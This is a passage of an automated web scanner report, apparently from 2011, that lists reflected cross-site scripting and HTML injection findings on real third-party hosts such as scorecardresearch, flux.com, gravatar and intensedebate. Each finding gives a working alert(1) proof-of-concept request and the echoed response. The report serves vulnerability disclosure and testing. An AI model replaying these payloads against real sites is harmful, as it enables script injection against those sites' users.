Expires: Mon, 20 Jun 2011 17:45:54 GMT
Date: Mon, 13 Jun 2011 17:45:54 GMT
Content-Length: 3599
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/ontv/", c5:"20000", c6:"", c10:"", c15:"ed9b7<script>alert(1)</script>76715acdffe", c16:"", r:""});



3.12. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 9d049<script>alert(1)</script>23421510a6e was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=60360349d049<script>alert(1)</script>23421510a6e&c3=&c4=/ontv/&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:49 GMT
Date: Mon, 13 Jun 2011 17:45:49 GMT
Content-Length: 3599
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"60360349d049<script>alert(1)</script>23421510a6e", c3:"", c4:"/ontv/", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});



3.13. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 99270<script>alert(1)</script>dde17540461 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=99270<script>alert(1)</script>dde17540461&c4=/ontv/&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:50 GMT
Date: Mon, 13 Jun 2011 17:45:50 GMT
Content-Length: 3599
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036034", c3:"99270<script>alert(1)</script>dde17540461", c4:"/ontv/", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});



3.14. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload dbdf5<script>alert(1)</script>0949ac68ed9 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=&c4=/ontv/dbdf5<script>alert(1)</script>0949ac68ed9&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:51 GMT
Date: Mon, 13 Jun 2011 17:45:51 GMT
Content-Length: 3599
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/ontv/dbdf5<script>alert(1)</script>0949ac68ed9", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});



3.15. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 200b9<script>alert(1)</script>b8a7f3d243d was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=&c4=/ontv/&c5=20000200b9<script>alert(1)</script>b8a7f3d243d&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:51 GMT
Date: Mon, 13 Jun 2011 17:45:51 GMT
Content-Length: 3599
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
score;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/ontv/", c5:"20000200b9<script>alert(1)</script>b8a7f3d243d", c6:"", c10:"", c15:"", c16:"", r:""});



3.16. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 45df9<script>alert(1)</script>408425a65e6 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036034&c3=&c4=/ontv/&c5=20000&c6=45df9<script>alert(1)</script>408425a65e6&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 17:45:53 GMT
Date: Mon, 13 Jun 2011 17:45:53 GMT
Content-Length: 3599
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
or(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036034", c3:"", c4:"/ontv/", c5:"20000", c6:"45df9<script>alert(1)</script>408425a65e6", c10:"", c15:"", c16:"", r:""});



3.17. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Comments/-/threaded [includeWBR&callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://daapiak.flux.com
Path:   /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Comments/-/threaded

Issue detail

The value of the includeWBR&callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 48db4%3balert(1)//62468e88888 was submitted in the includeWBR&callback parameter. This input was echoed as 48db4;alert(1)//62468e88888 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Comments/-/threaded?q=mgid%3Acms%3Aitem%3Amtv.com%3A10325912&start-index=1&max-results=20&commentId=-1&includeWBR&callback=FD0607159300748db4%3balert(1)//62468e88888 HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTUID=BD68167B-8714-4A0A-8544-E6985A15524C

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w09g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 32486
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:27:54 GMT
Connection: close

if (typeof(FD0607159300748db4;alert(1)//62468e88888) == 'function'){FD0607159300748db4;alert(1)//62468e88888({"EndIndex":20,"IsFirstPage":true,"IsLastPage":false,"Items":[{"ChildComments":null,"Creator":{"InitialConnection":1,"LoginName":null,"ProfileU
...[SNIP]...

3.18. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/ [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://daapiak.flux.com
Path:   /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 961e7%3balert(1)//89daa690b16 was submitted in the callback parameter. This input was echoed as 961e7;alert(1)//89daa690b16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/?q=mgid%3Auma%3Avideolist%3Amtv.com%3A1665248&callback=F759D20533007961e7%3balert(1)//89daa690b16 HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTUID=BD68167B-8714-4A0A-8544-E6985A15524C

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w04g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 4161
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:19:19 GMT
Connection: close

if (typeof(F759D20533007961e7;alert(1)//89daa690b16) == 'function'){F759D20533007961e7;alert(1)//89daa690b16({"Title":"Teen Wolf | Ep. 2 | Second Chance At First Line","Ucid":"D3FCFFFF0002D51D001B01467146","Thumbnails":{"__type":"VideoThumbnailsData","
...[SNIP]...

3.19. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://daapiak.flux.com
Path:   /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5c20c%3balert(1)//bdd2a2a47da was submitted in the callback parameter. This input was echoed as 5c20c;alert(1)//bdd2a2a47da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage?q=mgid%3Acms%3Aitem%3Amtv.com%3A10325912&callback=F9A3A187B30075c20c%3balert(1)//bdd2a2a47da HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTUID=BD68167B-8714-4A0A-8544-E6985A15524C

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w08g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 583
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:20:25 GMT
Connection: close

if (typeof(F9A3A187B30075c20c;alert(1)//bdd2a2a47da) == 'function'){F9A3A187B30075c20c;alert(1)//bdd2a2a47da({"CommentCount":34,"CommentData":null,"GainRatingCount":0,"IsFirstPage":false,"IsInvisible":false,"IsLastPage":false,"OverallFiveStarRating":0,
...[SNIP]...

3.20. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://daapiak.flux.com
Path:   /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload cdf46%3balert(1)//305c1f01dcb was submitted in the callback parameter. This input was echoed as cdf46;alert(1)//305c1f01dcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services?earlyServicesOnly=true&callback=F6C1C761B3007cdf46%3balert(1)//305c1f01dcb HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTUID=BD68167B-8714-4A0A-8544-E6985A15524C

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w10g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 3629
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:20:23 GMT
Connection: close

if (typeof(F6C1C761B3007cdf46;alert(1)//305c1f01dcb) == 'function'){F6C1C761B3007cdf46;alert(1)//305c1f01dcb([{"__type":"ExternalShareServiceData","LargeThumbnailUrl":"http:\/\/static0.fluxstatic.com\/-\/Clients\/Common\/Img\/ExternalCommunityThumbnail
...[SNIP]...

3.21. http://en.gravatar.com/site/implement [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.gravatar.com
Path:   /site/implement

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14fe1"><a>158c986cf81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /site14fe1"><a>158c986cf81/implement HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=236484949.1308011412.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=236484949.232928841.1308011412.1308011412.1308011412.1; __utmc=236484949; __utmb=236484949.1.10.1308011412; __qca=P0-894869797-1308011414185

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:37 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:33:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 8537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
<a href="http://en.gravatar.com/site14fe1"><a>158c986cf81/implement.json">
...[SNIP]...

3.22. http://en.gravatar.com/site/login/%252F [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.gravatar.com
Path:   /site/login/%252F

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f83a0"><a>822417fb1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitef83a0"><a>822417fb1b/login/%252F HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=236484949.1308011412.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-894869797-1308011414185; __utma=236484949.232928841.1308011412.1308011412.1308011412.1; __utmc=236484949; __utmb=236484949.2.10.1308011412

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:40 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:33:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 8549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
<a href="http://en.gravatar.com/sitef83a0"><a>822417fb1b/login/%252F.json">
...[SNIP]...

3.23. http://en.gravatar.com/site/login/%252F [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.gravatar.com
Path:   /site/login/%252F

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44a34"><a>f3a3ad4ddd1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /site/login/%252F44a34"><a>f3a3ad4ddd1 HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=236484949.1308011412.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-894869797-1308011414185; __utma=236484949.232928841.1308011412.1308011412.1308011412.1; __utmc=236484949; __utmb=236484949.2.10.1308011412

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:34:05 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:34:05 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 6358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
<form method="post" action="/sessions/44a34"><a>f3a3ad4ddd1">
...[SNIP]...

3.24. http://intensedebate.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ed5a1'><script>alert(1)</script>0497f372f83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ed5a1'><script>alert(1)</script>0497f372f83=1 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:31:27 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 18492

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/?ed5a1'><script>alert(1)</script>0497f372f83=1'>
...[SNIP]...

3.25. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload b436c<script>alert(1)</script>1dbb46b674e was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G07608b436c<script>alert(1)</script>1dbb46b674e HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 14 Jun 2011 00:13:59 GMT
Cache-Control: max-age=86400, private
Expires: Wed, 15 Jun 2011 00:13:59 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:13:59 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G07608B436C<SCRIPT>ALERT(1)</SCRIPT>1DBB46B674E" was not recognized.
*/

3.26. http://members.pega.com/cookiecheck.asp [pcd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://members.pega.com
Path:   /cookiecheck.asp

Issue detail

The value of the pcd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36122"%3balert(1)//fab585167f2 was submitted in the pcd parameter. This input was echoed as 36122";alert(1)//fab585167f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cookiecheck.asp?pcd=/login.asp36122"%3balert(1)//fab585167f2 HTTP/1.1
Host: members.pega.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
